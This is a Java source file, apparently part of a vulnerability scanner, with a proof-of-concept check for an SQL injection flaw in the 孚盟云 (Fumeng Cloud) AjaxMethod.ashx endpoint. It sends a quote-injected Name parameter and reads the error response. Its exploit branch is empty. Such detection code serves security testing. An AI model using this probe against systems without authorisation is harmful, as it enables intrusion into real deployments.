package com.achuna33.Controllers;


import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

@BasicMapping(uri = "孚盟云")
public class FumengYunController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description="孚盟云 AjaxMethod.ashx SQL注入漏洞" ,SupportVulType= SupportVul.SQLInjection)
    public void vul_Getfile(Poc_Exp type, String target, Object... args) throws Exception {
        WriteLog("\n开始检测：  孚盟云 AjaxMethod.ashx SQL注入漏洞");

        switch (type){
            case EXP:
                break;
            case POC:

                HttpRequest httpRequest = new HttpRequest(target+"/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27");
                Response result = httpRequest.Get("");
                if(result.responseBody.toLowerCase().contains("'Y'")){
                    WriteLog(" 存在漏洞");
                    WriteLog(result.responseBody);
                }else {
                    WriteLog(" 不存在漏洞");
                }
                WriteLog("\n"+result.responseBody);
        }
    }
}
